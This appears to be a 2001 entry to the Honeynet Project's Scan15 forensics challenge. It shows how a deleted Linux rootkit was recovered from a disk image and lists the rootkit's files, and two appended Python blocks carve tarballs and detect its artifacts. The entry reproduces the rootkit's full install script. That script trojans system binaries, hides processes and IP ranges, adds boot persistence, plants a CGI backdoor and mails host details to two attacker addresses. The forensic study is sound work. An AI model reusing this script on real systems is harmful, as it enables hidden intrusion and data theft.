From jkr006@csi1st.net Tue May 22 22:36:38 2001
Date: Thu, 03 May 2001 00:35:33 -0400
From: "John K. Riggleman, Jr."
To: project@honeynet.org
Subject: Entry for Scan15

Will be looking forward to seeing how the other people approached this problem. :)

[ Part 2: "Attached Text" ]

==========
= SCAN15 =
==========

*************************************************************************************************
* 1. - Show step by step how you identify and recover the deleted rootkit from the / partition. *
*************************************************************************************************

(Note: The method that I used is doubtfully the best method. I did the recovery without the aid
of special tools or programs. A text editor, hex editor, Linux system, and a programming language
were all that were used (aside from an unzipping program). Just bear in mind that if this seems
like a difficult way to recover the information, this way is not the only way.)

Tools used: EDIT.EXE / HIEW.EXE / A REDHAT SYSTEM / QBASIC

Initially I assumed that the rootkit would have been downloaded in the form of a TAR or TAR.GZ.
Opening HIEW (hex editor), I searched for ".tar", and the first instance was within the install
script (part of the rootkit). At that point I decided to write a simple program to dump this
information to a file. The QBasic program is attached to the end of this article along with some
interesting offsets to dump. The program would request a "Start" and "End" offset, which I would
get from the hex editor.

After dumping this file and examining it, I noticed that a file called "computer" was created and
emailed to two addresses. I let the hex editor search for "Cpu Speed:" (something that would not
likely be in any other files), and it turned up copies of the two emails with the data attached.

After freeing up 256 megs on the Redhat system in the other room, I FTPed the image over the
internal LAN. The file was actually larger than 255 megs, so I worked with what I had gotten to
the system. After mounting the file as described by "http://project.honeynet.org/challenge", I
looked into the directory specified in the install file (/dev/ida/.drag-on/). After copying those
files over the network to my NT system, I realized that I did not have the /usr/bin directory,
which would have most of the rootkit's files.

Examining the install file again yielded the information that the file was actually "lk.tgz".
Opening and comparing several TGZ files with EDIT, I noticed that each file began with the 3
characters: 31 139 8. Searching for these 3 characters within the image file produced an
immediate result. Assuming that it could be a file other than the rootkit, I decided that
trial-and-error would have to be adequate. The TGZ which was returned by the QBasic program would
extract to a .TAR in WinZip, but the TAR file would not extract. At that point I downloaded
untar.exe at: http://www.albany.net/~cprimus/programs/untar.exe. Still only getting "ssh" out of
the archive, I returned to tried-and-true EDIT. Searching for "last/" showed that the file after
ssh was pidfile. By selecting/backspacing all of the entries before it, several more of the files
extracted. The only problem which arose with this was that near the end of the file, around
"last/top", a large number of NULLs were replaced by characters of the value D5h. I looked through
the files which remained after "last/top" and noticed that I had them from the files I took from
/dev/ida/.drag-on. Therefore, the only file I did not successfully recover was "top", but that
would exist in the /usr/bin directory on: "/dev/hda5 /usr".

************************************************
* 2. - What files make up the deleted rootkit? *
************************************************

===============================
= Included in the initial TGZ =
===============================

last/                  # Directory for all of the files
last/ssh               # SSH daemon
last/pidfile           # File to hold PID of ssh daemon (declared in ssh_config)
last/install           # A shell script to install the rootkit
last/linsniffer        # A network sniffer
last/cleaner           # A BASH shell script to clean logs to remove evidence of entry
last/inetd.conf        # An inetd configuration file which is written over the current one
last/lsattr            # A shell script added to /etc/rc.d/rc.sysinit to restart the sniffer
last/services          # A service configuration file which is written over the current one
last/sense             # A parser for linsniffer's output
last/ssh_config        # self-explanatory
last/ssh_host_key      # self-explanatory
last/ssh_host_key.pub  # self-explanatory
last/ssh_random_seed   # self-explanatory
last/sshd_config       # self-explanatory
last/sl2               # A port scanner
last/last.cgi          # CGI for issuing commands through a web browser
last/ps                # Trojanized process viewer
last/top               # Trojanized process viewer
last/netstat           # Trojanized network status viewer
last/logclear          # A script to delete linsniffer's log file
last/s                 # Another SSH config file
last/mkxfs             # Another SSH daemon

===================
= Generated files =
===================

/dev/ida/.drag-on/tcp.log  # For use by linsniffer
/dev/ida/.. /tcp.log       # For use by linsniffer (never used)
/dev/last                  # List of addresses and ports to hide
/dev/rpm                   # List of processes to hide
/last/computer             # System info. emailed to: bidi_damm@yahoo.com / last@linuxmail.org

~~~~~~~~~~~~~~~~~~~ Locations of files after installation ~~~~~~~~~~~~~~~~~~~

"/dev"
    rpm
    last

"/dev/ida/.drag-on/" and "/dev/ida/.. /"
    linsniffer
    logclear
    mkxfs
    s
    sense
    sl2
    ssh_host_key
    ssh_random_seed
    tcp.log

"/bin"
    ps
    netstat

"/sbin"
    ifconfig

"/etc"
    inetd.conf
    services

"/usr/bin"
    lsattr
    top

"/usr/sbin"
    mkxfs

"/home/httpd/cgi-bin/" or "/usr/local/httpd/cgi-bin/" or "/usr/local/apache/cgi-bin/"
or "/www/httpd/cgi-bin" or "/www/cgi-bin/" (depending on whether the directory exists)
    last.cgi

*********
* BONUS *
***************************************************************************
* Was the rootkit ever actually installed on the system? How do you know? *
***************************************************************************

Yes, the rootkit was installed. The main fact to support this claim is the existence of /dev/last
and /dev/rpm. They are generated from the install file, so it was absolutely run. Also, the
existence of those 2 emails with the "computer" file attached shows that the install file did
generate that file with statistics about the computer and mail them.

To sidetrack slightly... I find it quite perplexing that the files /dev/last and /dev/rpm were
created when the rootkit's trojanized utilities look to /dev/caca and /dev/dsx. This is clearly a
similar/the same rootkit used in Scan13, yet the person did not configure it correctly. The
sniffer may start and all of the other elements, but the ports, addresses, and processes will not
be hidden. Also note that the files that were placed into the ".drag-on" directory were also
placed in the ".. " directory, even though these files are never used.

<---------------------------------------------------------------------------------->
<--------------------- John K. Riggleman Jr. 5/2/01 3:39 AM ---------------------->
<---------------------------------------------------------------------------------->

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

(Note: For the QBasic program to work, the filenames and paths should be changed accordingly.
I renamed the image to "h.d" to avoid long-filename problems in DOS)

============
= ETRT.BAS =
============

' Dump the bytes between a "Start" and an "End" offset of the raw image into
' a separate file. Offsets are 1-based file positions (QBasic GET/PUT style)
' and were read off the hex editor.
OPEN "e:\honeynet\h.d" FOR BINARY AS #1      ' the disk image (renamed to h.d)
OPEN "e:\honeynet\output" FOR BINARY AS #2   ' the carved-out bytes
INPUT "Start Offset->", strt$
INPUT "End Offset->", endrt$
ar$ = "."                                    ' 1-byte buffer: GET/PUT move LEN(ar$) bytes
FOR a = 1 TO (VAL(endrt$) - VAL(strt$))
    GET #1, (VAL(strt$) + a - 1), ar$        ' read the byte at the absolute position
    PUT #2, a, ar$                           ' write it at the same relative position
NEXT
CLOSE #1, #2
PRINT "done"

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======================
= Offsets of interest =
======================

Offsets for "install"
    Start-> 9303041
    End  -> 9306753

Offsets for "lk.tgz"
    Start-> 314369
    End  -> 837774

Offsets for the two emails of the "computer" file
    Start-> 92587009
    End  -> 92588868

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

================
= install file =
================

(The script is reproduced as recovered; the Romanian messages are translated in trailing comments.)

#!/bin/sh
clear
unset HISTFILE
echo "********* Instalarea Rootkitului A Pornit La Drum *********"   # "Rootkit installation is under way"
echo "********* Mircea SUGI PULA ********************************"   # an obscene insult aimed at "Mircea"
echo "********* Multumiri La Toti Care M-Au Ajutat **************"   # "Thanks to everyone who helped me"
echo "********* Lemme Give You A Tip : **************************"
echo "********* Ignore everything, call your freedom ************"
echo "********* Scream & swear as much as you can ***************"
echo "********* Cuz anyway nobody will hear you and no one will *"
echo "********* Care about you **********************************"
echo
echo
chown root.root *
if [ -f /usr/bin/make ]; then
    echo "Are Make !"                        # "Has make!"
else
    echo "Nu Are Make !"                     # "No make!"
fi
if [ -f /usr/bin/gcc ]; then
    echo "Are Gcc !"                         # "Has gcc!"
else
    echo "Nu Are Gcc !"                      # "No gcc!"
fi
if [ -f /usr/sbin/sshd/ ]; then              # trailing slash: -f can never match, so this always reports "Nu Are Ssh"
    echo "Are Ssh !"                         # "Has ssh!"
else
    echo "Nu Are Ssh !"                      # "No ssh!"
fi
echo -n "* Inlocuim nestat ... alea alea "   # "Replacing netstat ... and the rest"
rm -rf /sbin/ifconfig
mv ifconfig /sbin/ifconfig
rm -rf /bin/netstat
mv netstat /bin/netstat
rm -rf /bin/ps
mv ps /bin/ps
rm -rf /usr/bin/top
mv top /usr/bin/top
cp -f mkxfs /usr/sbin/
echo "* Gata..."                             # "Done..."
echo -n "* Dev... "
echo
echo
touch /dev/rpm >/dev/rpm
echo "3 sl2" >>/dev/rpm
echo "3 sshdu" >>/dev/rpm
echo "3 linsniffer" >>/dev/rpm
echo "3 smurf" >>/dev/rpm
echo "3 slice" >>/dev/rpm
echo "3 mech" >>/dev/rpm
echo "3 muh" >>/dev/rpm
echo "3 bnc" >>/dev/rpm
echo "3 psybnc" >> /dev/rpm
touch /dev/last >/dev/last
echo "1 193.231.139" >>/dev/last
echo "1 213.154.137" >>/dev/last
echo "1 193.254.34" >>/dev/last
echo "3 48744" >>/dev/last
echo "3 3666" >>/dev/last
echo "3 31221" >>/dev/last
echo "3 22546" >>/dev/last
echo "4 48744" >>/dev/last
echo "4 2222" >>/dev/last
echo "* Gata"                                # "Done"
echo "* Facem Director...Si Mutam Alea.. "   # "Making the directory... and moving those things"
mkdir -p /dev/ida/.drag-on
mkdir -p /dev/ida/".. "
echo "* Copiem ssh si alea"                  # "Copying ssh and the rest"
cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.drag-on/
cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/".. "
rm -rf linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed
touch /dev/ida/.drag-on/tcp.log
touch /dev/ida/".. "/tcp.log
cp -f inetd.conf /etc
cp -f services /etc
killall -HUP inetd
echo
echo
echo
echo "* Adaugam In Startup:) ..."            # "Adding to startup :) ..."
rm -rf /usr/bin/lsattr
echo "/usr/bin/lsattr -t1 -X53 -p" >> /etc/rc.d/rc.sysinit
echo >> /etc/rc.d/rc.sysinit
cp -f lsattr /usr/bin/
chmod 500 /usr/bin/lsattr
chattr +i /usr/bin/lsattr
/usr/bin/lsattr
sleep 1
if [ -d /home/httpd/cgi-bin ]
then
    mv -f last.cgi /home/httpd/cgi-bin/
fi
if [ -d /usr/local/httpd/cgi-bin ]
then
    mv -f last.cgi /usr/local/httpd/cgi-bin/
fi
if [ -d /usr/local/apache/cgi-bin ]
then
    mv -f last.cgi /usr/local/apache/cgi-bin/
fi
if [ -d /www/httpd/cgi-bin ]
then
    mv -f last.cgi /www/httpd/cgi-bin/
fi
if [ -d /www/cgi-bin ]
then
    mv -f last.cgi /www/cgi-bin/
fi
echo "* Luam Informatiile dorite ..."        # "Gathering the desired information ..."
echo "* Info : $(uname -a)" >> computer
echo "* Hostname : $(hostname -f)" >> computer
echo "* IfConfig : $(/sbin/ifconfig | grep inet)" >> computer
echo "* Uptime : $(uptime)" >> computer
echo "* Cpu Vendor ID : $(cat /proc/cpuinfo|grep vendor_id)" >> computer
echo "* Cpu Model : $(cat /proc/cpuinfo|grep model)" >> computer
echo "* Cpu Speed: $(cat /proc/cpuinfo|grep MHz)" >> computer
echo "* Bogomips: $(cat /proc/cpuinfo|grep bogomips)" >> computer
echo "* Spatiu Liber: $(df -h)" >> computer                            # "Free space:"
echo "* Gata ! Trimitem Mailul ...Asteapta Te Rog "                    # "Done! Sending the mail... please wait"
cat computer | mail -s "placinte" last@linuxmail.org                   # subject "placinte" = "pies"
cat computer | mail -s "roote" bidi_damm@yahoo.com
echo "* Am trimis mailul ... stergem fisierele care nu mai trebuie ."  # "Mail sent ... deleting the files that are no longer needed."
echo
echo
echo "* G A T A *"                           # "D O N E"
echo
echo "* That Was Nice Last "
cd /
rm -rf last lk.tgz computer lk.tar.gz

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

====================================================
= One of the emails containing the "computer" file =
====================================================

To: last@linuxmail.org
Subject: placinte

* Info : Linux asdf1 2.2.14-5.0 #1 Tue Mar 7 20:53:41 EST 2000 i586 unknown
* Hostname : asdf1
* IfConfig : inet addr:127.0.0.1  Bcast:127.255.255.255  Mask:255.0.0.0
             inet addr:172.16.1.108  Bcast:172.16.1.255  Mask:255.255.255.0
* Uptime : 7:45pm up 8:23, 0 users, load average: 0.00, 0.00, 0.00
* Cpu Vendor ID : vendor_id : GenuineIntel
* Cpu Model : model      : 4
              model name : Pentium MMX
* Cpu Speed: cpu MHz : 200.457171
* Bogomips: bogomips : 399.77
* Spatiu Liber: Filesystem   Size  Used Avail Use% Mounted on
                /dev/hda8    251M   33M  205M  14% /
                /dev/hda1     23M  2.4M   19M  11% /boot
                /dev/hda6    1.6G  2.1M  1.5G   0% /home
                /dev/hda5    1.6G  367M  1.2G  23% /usr
                /dev/hda7    251M  5.3M  232M   2% /var
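The recovery procedure under question 1 (search the raw image for the three gzip magic bytes 31 139 8, dump the byte range with ETRT.BAS, then salvage what the damaged tar still yields) can be scripted so that every candidate hit is validated by actually inflating it, which is the step the hex-editor approach leaves to trial and error. The block below is an added example and is not code from the original write-up or from the Honeynet Project. The "image" it scans is constructed in memory (filler, a decoy magic with an invalid flag byte, then a stand-in two-member "last/" tarball); the member names and offsets are stand-ins, not those of the real lk.tgz.

```python
"""Carve gzip-compressed tarballs out of a raw disk image (added example)."""
import gzip
import io
import tarfile
import zlib

GZIP_MAGIC = b"\x1f\x8b\x08"   # ID1 ID2 CM=deflate: 31 139 8 in decimal


def dump_range(image: bytes, start: int, end: int) -> bytes:
    """Same job as ETRT.BAS: copy bytes start..end-1 of the image (0-based here)."""
    return image[start:end]


def find_all(image: bytes, needle: bytes):
    """Yield every offset of `needle` (works for GZIP_MAGIC, b"Cpu Speed:", ...)."""
    off = image.find(needle)
    while off != -1:
        yield off
        off = image.find(needle, off + 1)


def carve_gzip(image: bytes, offset: int):
    """Inflate the gzip member starting at `offset`.

    Returns (data, end_offset, complete), or None when the bytes are not a
    gzip stream at all. `complete` is False when the image ends before the
    gzip trailer (the write-up worked from a truncated copy of the image);
    `data` then holds whatever inflated cleanly.
    """
    d = zlib.decompressobj(16 + zlib.MAX_WBITS)   # +16: expect a gzip header
    try:
        data = d.decompress(image[offset:]) + d.flush()
    except zlib.error:                            # bad header or corrupt deflate data
        return None
    end = len(image) - len(d.unused_data)         # first byte after the gzip trailer
    return data, end, d.eof


def list_tar_partial(tar_bytes: bytes):
    """Walk a tar member by member and stop at the first unreadable header,
    keeping the names read so far (the write-up salvaged its damaged archive
    the same way, by cutting the corrupt tail away in a text editor)."""
    names = []
    try:
        with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:") as tf:
            for member in tf:
                names.append(member.name)
    except tarfile.TarError:
        pass
    return names


def carve_tarballs(image: bytes):
    """Scan the whole image for gzip headers; keep only hits that inflate
    into something tarfile can read, so false 3-byte matches drop out."""
    hits = []
    for off in find_all(image, GZIP_MAGIC):
        carved = carve_gzip(image, off)
        if carved is None:
            continue
        data, end, complete = carved
        members = list_tar_partial(data)
        if members:
            hits.append({"offset": off, "end": end, "complete": complete,
                         "members": members})
    return hits


# ---- constructed sample data (stand-ins, not the real lk.tgz) ---------------

def build_tar() -> bytes:
    """A two-member 'last/' archive like the one the install script unpacks."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w", format=tarfile.USTAR_FORMAT) as tf:
        for name, body in (("last/install", b"#!/bin/sh\n# stand-in\n"),
                           ("last/ssh", b"\x7fELF" + b"\x00" * 60)):
            info = tarfile.TarInfo(name)
            info.size = len(body)
            info.mtime = 0
            tf.addfile(info, io.BytesIO(body))
    return buf.getvalue()


def damage_archive(tar_bytes: bytes) -> bytes:
    """Reproduce the damage the write-up saw: from the second member's
    512-byte header onward, every NUL is replaced by 0xD5."""
    cut = tar_bytes.find(b"last/ssh")
    return tar_bytes[:cut] + tar_bytes[cut:].replace(b"\x00", b"\xd5")


def build_sample_image():
    """Fake partition image: filler, a decoy gzip magic (invalid flag byte),
    then the real stand-in tgz. Returns (image, offset_of_real_tgz)."""
    tgz = gzip.compress(build_tar(), mtime=0)
    before = b"\x00" * 1000 + b"junk" + GZIP_MAGIC + b"\xff" * 32 + b"\x00" * 500
    return before + tgz + b"\x00" * 1000, len(before)


if __name__ == "__main__":
    image, real = build_sample_image()
    for hit in carve_tarballs(image):
        print(hit["offset"], hit["end"], hit["complete"], hit["members"])
```

On a real image, read the partition into `image` (or replace the slicing with seeks on an open file) and run `carve_tarballs`; the decoy shows why the three-byte magic alone is not enough, and the truncated and 0xD5-damaged cases show what is still recoverable when the archive is incomplete.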
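The bonus answer rests on what the install script above leaves on disk: /dev/rpm and /dev/last, the two hidden directories under /dev/ida, the mkxfs copy, the immutable lsattr stub with the line appended to rc.sysinit, and last.cgi in whichever cgi-bin exists. The write-up also notes that the trojaned binaries read /dev/caca and /dev/dsx, not the lists the script writes. The block below turns those observations into a check that can be run against the mount point of a read-only copy of the image; it is an added example, not code from the original write-up or from the Honeynet Project. The tree it scans is constructed in a temp directory as a stand-in for the mounted honeypot image, and the meaning of the numeric codes in the hide lists is not given on the page, so they are parsed but not interpreted.

```python
"""Check a mounted root filesystem for the artifacts of the recovered install script
(added example; `root` is the mount point of the image, never the live /dev)."""
import os
import tempfile

# Files and directories the install script creates, relative to the mount point.
INSTALL_ARTIFACTS = [
    "dev/rpm", "dev/last",
    "dev/ida/.drag-on", "dev/ida/.. ",          # the second name really ends in a space
    "dev/ida/.drag-on/tcp.log", "dev/ida/.drag-on/linsniffer",
    "usr/sbin/mkxfs", "usr/bin/lsattr",
]
TROJAN_HIDE_LISTS = ["dev/caca", "dev/dsx"]    # what the trojaned binaries actually read
CGI_DIRS = ["home/httpd/cgi-bin", "usr/local/httpd/cgi-bin",
            "usr/local/apache/cgi-bin", "www/httpd/cgi-bin", "www/cgi-bin"]
RC_SYSINIT_HOOK = "/usr/bin/lsattr -t1 -X53 -p"   # line the script appends to rc.sysinit


def parse_hide_list(text):
    """Parse /dev/rpm or /dev/last: one '<code> <value>' per line.
    The write-up does not say what the codes mean, so they are kept as integers."""
    entries = []
    for line in text.splitlines():
        parts = line.split(None, 1)
        if len(parts) == 2 and parts[0].isdigit():
            entries.append((int(parts[0]), parts[1].strip()))
    return entries


def _read(root, rel):
    path = os.path.join(root, rel)
    if not os.path.isfile(path):
        return ""
    with open(path, "r", errors="replace") as fh:
        return fh.read()


def scan_root(root):
    """Report which rootkit artifacts exist under `root`."""
    def exists(rel):
        return os.path.lexists(os.path.join(root, rel))
    present = [p for p in INSTALL_ARTIFACTS if exists(p)]
    lsattr = os.path.join(root, "usr/bin/lsattr")
    report = {
        "artifacts": present,
        "hide_processes": parse_hide_list(_read(root, "dev/rpm")),
        "hide_network": parse_hide_list(_read(root, "dev/last")),
        "trojan_hide_lists": [p for p in TROJAN_HIDE_LISTS if exists(p)],
        "rc_sysinit_hook": RC_SYSINIT_HOOK in _read(root, "etc/rc.d/rc.sysinit"),
        "last_cgi": [d for d in CGI_DIRS if os.path.isfile(os.path.join(root, d, "last.cgi"))],
        # the script does chmod 500; the chattr +i flag needs lsattr on the mounted fs
        "lsattr_mode_500": os.path.isfile(lsattr) and (os.stat(lsattr).st_mode & 0o777) == 0o500,
    }
    # /dev/rpm and /dev/last only come from the install script: both present means it ran.
    report["installed"] = "dev/rpm" in present and "dev/last" in present
    # Installed, but the lists the trojans read are absent: nothing is actually hidden.
    report["misconfigured"] = report["installed"] and not report["trojan_hide_lists"]
    return report


# ---- constructed sample tree (stand-in for the mounted honeypot image) -------

def build_sample_root():
    """Replay the file-system effects of the install script into a temp dir."""
    root = tempfile.mkdtemp(prefix="scan15-")

    def put(rel, data=b"", mode=None):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
        if mode is not None:
            os.chmod(path, mode)

    put("dev/rpm", b"3 sl2\n3 sshdu\n3 linsniffer\n3 smurf\n3 slice\n3 mech\n"
                   b"3 muh\n3 bnc\n3 psybnc\n")
    put("dev/last", b"1 193.231.139\n1 213.154.137\n1 193.254.34\n3 48744\n"
                    b"3 3666\n3 31221\n3 22546\n4 48744\n4 2222\n")
    for d in ("dev/ida/.drag-on", "dev/ida/.. "):
        put(d + "/tcp.log")
        put(d + "/linsniffer", b"\x7fELF")
    put("usr/sbin/mkxfs", b"\x7fELF")
    put("usr/bin/lsattr", b"#!/bin/sh\n", mode=0o500)
    put("etc/rc.d/rc.sysinit", b"#!/bin/sh\n# ...\n" + RC_SYSINIT_HOOK.encode() + b"\n\n")
    put("home/httpd/cgi-bin/last.cgi", b"#!/bin/sh\n")
    return root


if __name__ == "__main__":
    for key, value in scan_root(build_sample_root()).items():
        print(f"{key}: {value}")
```

Point `scan_root` at the mount point of the image copy rather than at `/`: the live analysis box's /dev is not the evidence, and the `misconfigured` flag reproduces the write-up's observation that the script populated /dev/last and /dev/rpm while the trojaned tools look elsewhere.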